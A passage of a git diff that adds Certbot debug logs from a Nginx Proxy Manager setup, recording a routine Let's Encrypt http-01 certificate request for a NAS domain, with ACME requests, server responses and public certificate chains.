+YT8YgkO7GiThZ3IJTA3obffj5P4ihmw9oEC2OV/MK8RInKICMEkXxDYAAkOYwArX +shFmXZ2zXPkaPXP/KRMzuuwCvT/nb/aEnm8xEVhw6eJpoZTZNw== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP +MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy +Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa +Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF +bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c +S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb +R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB +9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB +MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j +cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB +BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE +DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j +ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 +RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d +AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 +otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA +aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm +Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 +HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 +Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR +xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d +tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ +jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS +u1igv3OefnWjSQ== +-----END CERTIFICATE----- + +2025-12-25 04:09:30,492:DEBUG:acme.client:Storing nonce: IijzadlSBrGQq8EL2p_eEBtYvyOFMAyIwnHfZklZfLikEVdn6D8 +2025-12-25 04:09:30,493:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:09:30,496:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7/1: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJJaWp6YWRsU0JyR1FxOEVMMnBfZUVCdFl2eU9GTUF5SXduSGZaa2xaZkxpa0VWZG42RDgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZkZGZjNmI2NmM3NTUyNzMwMDE1ZjhkMDhmOTcyNjdlY2M3LzEifQ", + "signature": "J2RP1TkFVHBf82mXH_uYG_ybNG_bb-ePgaIGHlg3cTzkQ_4erJvY1gjilf1aW7i2QD7P_BDfZig7h8LwoGWce0IEK1fdpUAdPhprtAHd5RfXuCMs6j90k1TOg8u0RrbJPK0NOpgZdG3KbQHHpU3s43GSrj7vT8qOZvwe3SCfwG6F88dpUDv6TynzaIZxjYFcr_LqJGG40_Uvq1dTFzlq91XuKMz0M8h9Bqh5Rl-4sXbBPdi3iaB54QB4UqjDtkWUKMTpC2UCSxdFuUWWSlj4Wbwff6wb_y9dZMzf0aZq54boVWuIcL-zJKlr82oVJHlJPI_gsNu8NC3als1mNPA06A", + "payload": "" +} +2025-12-25 04:09:30,642:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06ddfc6b66c7552730015f8d08f97267ecc7/1 HTTP/1.1" 200 2344 +2025-12-25 04:09:30,643:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:09:30 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2344 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: IijzadlS51Z-qep3N-zZsuD5T8wrV0T-UyEG7pepPLt_eB1sfhw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDsTCCAzegAwIBAgISBt38a2bHVScwAV+NCPlyZ+zHMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +ODAeFw0yNTEyMjUwMzEwNThaFw0yNjAzMjUwMzEwNTdaMBoxGDAWBgNVBAMTD25h +cy5wcm9maWJvdC5odTB2MBAGByqGSM49AgEGBSuBBAAiA2IABBN3gdSxZs2pmRJz +pG87o/Uzi7bGIQNhbcYUAF4Q+mUbObgSxnRIuHpPfAyNMBQRq0JDf3pvmRdGtErS ++suGG4xDGXWEDNdj49BmqibqY1zJ9w2nbuj+G7m7FOwjCVuoFKOCAiYwggIiMA4G +A1UdDwEB/wQEAwIHgDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYD +VR0TAQH/BAIwADAdBgNVHQ4EFgQUNSFbsdClVjQpkA4Rj9ZHAAdZCw4wHwYDVR0j +BBgwFoAUjw0TovYuftFQbDMYOF1ZjiNykcowMgYIKwYBBQUHAQEEJjAkMCIGCCsG +AQUFBzAChhZodHRwOi8vZTguaS5sZW5jci5vcmcvMBoGA1UdEQQTMBGCD25hcy5w +cm9maWJvdC5odTATBgNVHSAEDDAKMAgGBmeBDAECATAtBgNVHR8EJjAkMCKgIKAe +hhxodHRwOi8vZTguYy5sZW5jci5vcmcvNzIuY3JsMIIBDQYKKwYBBAHWeQIEAgSB +/gSB+wD5AH8AcX6V88I4im2x44RJPTHhWqliCHYtQgDgBQzQZ7WmYeIAAAGbU7KL +gwAIAAAFAAUdSgEEAwBIMEYCIQD4Pv7ndtk4R/swH+lOq/5iuSHgiloZk3fDbt+j +yiu0JQIhAN0V4ZOYvJxPBzZ3NX7jVkncIEGe3bx5Ljl2rXfnlKW/AHYA0W6ppWgH +fmY1oD83pd28A6U8QRIU1IgY9ekxsyPLlQQAAAGbU7KMHwAABAMARzBFAiBF8eaz +L3T9vhwIWjIaCG6AJb+Un4vf2s8DGivLiCWyYAIhAOycrWJg3GJAZJOW4KIzW1q2 +6Cq6ZEA/z3oWJ02wIT3XMAoGCCqGSM49BAMDA2gAMGUCMQCG2/ToF6lf10LXa7yJ +YT8YgkO7GiThZ3IJTA3obffj5P4ihmw9oEC2OV/MK8RInKICMEkXxDYAAkOYwArX +shFmXZ2zXPkaPXP/KRMzuuwCvT/nb/aEnm8xEVhw6eJpoZTZNw== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw +CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg +R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y +NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy +eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM +ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET +oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO +BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG +A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK +MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw +JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK +MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v +cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls +5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 +4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== +-----END CERTIFICATE----- + +2025-12-25 04:09:30,643:DEBUG:acme.client:Storing nonce: IijzadlS51Z-qep3N-zZsuD5T8wrV0T-UyEG7pepPLt_eB1sfhw +2025-12-25 04:09:30,645:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager +2025-12-25 04:09:30,646:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-13. +2025-12-25 04:09:30,647:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-13. +2025-12-25 04:09:30,647:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-13/cert.pem. +2025-12-25 04:09:30,648:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-13/privkey.pem. +2025-12-25 04:09:30,648:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-13/chain.pem. +2025-12-25 04:09:30,649:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-13/fullchain.pem. +2025-12-25 04:09:30,649:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-13/README. +2025-12-25 04:09:30,679:DEBUG:certbot.configuration:Var account=e417a583de478a0cfdeed332c1113068 (set by user). +2025-12-25 04:09:30,679:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). +2025-12-25 04:09:30,679:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). +2025-12-25 04:09:30,679:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). +2025-12-25 04:09:30,679:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). +2025-12-25 04:09:30,680:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). +2025-12-25 04:09:30,680:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). +2025-12-25 04:09:30,680:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). +2025-12-25 04:09:30,680:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:09:30,680:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:09:30,681:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). +2025-12-25 04:09:30,681:DEBUG:certbot.configuration:Var webroot_map={'nas.profibot.hu': '/data/letsencrypt-acme-challenge'} (set by user). +2025-12-25 04:09:30,683:DEBUG:certbot._internal.display.obj:Notifying user: +Successfully received certificate. +Certificate is saved at: /etc/letsencrypt/live/npm-13/fullchain.pem +Key is saved at: /etc/letsencrypt/live/npm-13/privkey.pem +This certificate expires on 2026-03-25. +These files will be updated when the certificate renews. +2025-12-25 04:09:30,683:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: +2025-12-25 04:09:30,683:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. +2025-12-25 04:09:30,685:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: + * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate + * Donating to EFF: https://eff.org/donate-le diff --git a/proxy-manager/data/logs/letsencrypt.log.7 b/proxy-manager/data/logs/letsencrypt.log.7 new file mode 100755 index 0000000..a01782b --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.7 @@ -0,0 +1,1845 @@ +2025-12-25 04:04:33,140:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2025-12-25 04:04:33,140:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2025-12-25 04:04:33,140:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-12', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'nas.profibot.hu'] +2025-12-25 04:04:33,141:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2025-12-25 04:04:33,151:DEBUG:certbot._internal.log:Root logging level set at 30 +2025-12-25 04:04:33,151:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2025-12-25 04:04:33,151:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2025-12-25 04:04:33,151:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2025-12-25 04:04:33,151:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2025-12-25 04:04:33,189:DEBUG:certbot._internal.main:Picked account: +2025-12-25 04:04:33,189:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2025-12-25 04:04:33,190:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2025-12-25 04:04:33,660:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2025-12-25 04:04:33,661:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:33 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "g8zUWWC2grM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2025-12-25 04:04:33,662:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for nas.profibot.hu +2025-12-25 04:04:33,669:DEBUG:acme.client:Requesting fresh nonce +2025-12-25 04:04:33,669:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2025-12-25 04:04:33,824:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2025-12-25 04:04:33,825:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:33 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEAb1xxtHk5qtQ9QIEoxgUg1J9SIisDZkVuC8gS9fUfgw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2025-12-25 04:04:33,825:DEBUG:acme.client:Storing nonce: 58tS3qjEAb1xxtHk5qtQ9QIEoxgUg1J9SIisDZkVuC8gS9fUfgw +2025-12-25 04:04:33,826:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "nas.profibot.hu"\n }\n ]\n}' +2025-12-25 04:04:33,829:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUFiMXh4dEhrNXF0UTlRSUVveGdVZzFKOVNJaXNEWmtWdUM4Z1M5ZlVmZ3ciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "RYeI771H_kMGzlqt0PwBinoWKOIMlRgWoMRQO0LPeXJWDUkmjZeUkaLKKoGgt3hlwp1_r_t636MVB4fGAznhRgob5arqLhU8RSaDkUErIj8PWQncyHte6kj57zZWvtADzmnkgz8yIAKUiHSE4OEh9r57LJsKRD1HilOL-I_l079U6gHvPqPYYBXDyodFNUG25pOobKjrTiNRhjvwerLUL3y6vuUG8QutuKP6oaOYK5nYrHMWMofO0tMs-8KdZQg-QyUJ3Fwrqu__184lwBs35o9Y38iJ5F6oHmCa46rJ5gLYxPbquJnO2QieXdemfF6S9uiquQAnrbVMdD4FLx-seg", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm5hcy5wcm9maWJvdC5odSIKICAgIH0KICBdCn0" +} +2025-12-25 04:04:34,010:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 349 +2025-12-25 04:04:34,011:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:33 GMT +Content-Type: application/json +Content-Length: 349 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462429183856 +Replay-Nonce: fULB7aUJUnGzHg5yZDnT_0mUoSEKjhbU3Qzg6GUDV2zIt0ML6cs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "identifiers": [ + { + "type": "dns", + "value": "nas.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462429183856" +} +2025-12-25 04:04:34,011:DEBUG:acme.client:Storing nonce: fULB7aUJUnGzHg5yZDnT_0mUoSEKjhbU3Qzg6GUDV2zIt0ML6cs +2025-12-25 04:04:34,012:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:34,016:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlVuR3pIZzV5WkRuVF8wbVVvU0VLamhiVTNRemc2R1VEVjJ6SXQwTUw2Y3MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "U2DuAvzbpEVjh-N_I3DX7-1CsM1tTITuW6_tNZLb_M03MD-Zrgxd3wOKYJS6M3Z6fzSsr8Ess2OcMgA2D-FEWbcsD-1qwawYi0eZ3gEipwkFZKPIgvmg8tNaB9HyqhQtHe3j99ma9sJfW8rcDrvC2MxEDVpJ9r81aSi9MSp6SvQ0v3Seg7SCa1sF9C56jqdFpkwZ3xUOnIQgIJ0aFNWqANJGa3i4w_8dCheli5ni8iSlSkSjwdUcx5CDA4qC8Erf8d1jbHhkI6pmvV01YTnEr8WH_5HKl9GKzQ65idVLJs-BB8XZw0C886gtZ2CmqBYNVkjJMARu43UkzEkCpM_TKQ", + "payload": "" +} +2025-12-25 04:04:34,185:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:34,186:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:34 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjED-OLY1tdB5n_Du-vYlTPfY_kNdBt7l-Qqao5qEvzu5M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "nas.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-01T04:04:33Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/8KXjIg", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" + } + ] +} +2025-12-25 04:04:34,186:DEBUG:acme.client:Storing nonce: 58tS3qjED-OLY1tdB5n_Du-vYlTPfY_kNdBt7l-Qqao5qEvzu5M +2025-12-25 04:04:34,187:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/5kmhBw', 'status': 'pending', 'token': 'IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA'} +2025-12-25 04:04:34,188:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-25 04:04:34,188:INFO:certbot._internal.auth_handler:http-01 challenge for nas.profibot.hu +2025-12-25 04:04:34,189:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-25 04:04:34,189:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-25 04:04:34,191:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA +2025-12-25 04:04:34,192:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-25 04:04:34,195:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRUQtT0xZMXRkQjVuX0R1LXZZbFRQZllfa05kQnQ3bC1RcWFvNXFFdnp1NU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2L19TanZ5dyJ9", + "signature": "jjKFujgKGZAnIa8syv0lMhhbqIbkb4tF3sJwmDOj2l6xBdN4fhRqEFrkeHeKigtk83tBlfH5xbwPqkBVEC3oCtXYygORFtrpg9S4tcfAcYcqrBFyMyp5T8xhHBfVX1cpRCYncDK1rNzwlMOPnMfLoNn4A3iTt_WRl8m9YpPDNAtCHTUSUVMQuFCPoN6OF9V8RLHq0SKspfpBWEFS4bAS_iEuMSTHOCD1EKCHiL9h_HYfESG9ySX5sw4Z7ls_xcgrYifv_WFiC8NpsH4ucJtD2WvYuyvY0uV1T-eP0rHz8BeQMUibvRl4SQo7BcZf85AiutwykrFg5RXmnSXgb8v1oA", + "payload": "e30" +} +2025-12-25 04:04:34,353:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632666504346/_Sjvyw HTTP/1.1" 200 195 +2025-12-25 04:04:34,354:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:34 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw +Replay-Nonce: 58tS3qjEvbTWLWpnKGtnU7qtQ7zmPlJE9rTY56gzL-q-OVp5uAs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632666504346/_Sjvyw", + "status": "pending", + "token": "IgudMLkJax-Ao-qh3W8Yweqle9mPOeVS1A-7ZffqrHA" +} +2025-12-25 04:04:34,354:DEBUG:acme.client:Storing nonce: 58tS3qjEvbTWLWpnKGtnU7qtQ7zmPlJE9rTY56gzL-q-OVp5uAs +2025-12-25 04:04:34,354:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-25 04:04:35,355:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 04:04:35,359:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632666504346: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRXZiVFdMV3BuS0d0blU3cXRRN3ptUGxKRTlyVFk1Nmd6TC1xLU9WcDV1QXMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNjY2NTA0MzQ2In0", + "signature": "cwNPHaBep_wxZDLixU6Wg2nTWMdX-Q3faS1crJD2lEJUR5WXQJh6ioqKAMprwddLecVtpaOwbYJwUBdvWsXFqkvYi-5nhAFuszXRTmvUnJ8hDtAUaWlrgJKe7vgK6obzlNgkNmWNwWnamTqIqUVPhosuHjxP9YrfUaAbuqqvahzdYEFsEYnA0rDympLE1u52p9-KjdSDmn2ILnXCWv4Vrf666KqDkuqOocxfTZ1EAB4H-Vr-kBoqmW9la40EVpwlUJdBiHH5MbXVdODyZbQZv5dGt_0uxllTkQ-xU0qRTcOK6mnrTazdFtEuqfaRjSt_swJT-F7N9nQwNP4PScPQ5w", + "payload": "" +} +2025-12-25 04:04:35,544:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632666504346 HTTP/1.1" 200 823 +2025-12-25 04:04:35,545:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 04:04:35 GMT +Content-Type: application/json +Content-Length: 823 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" 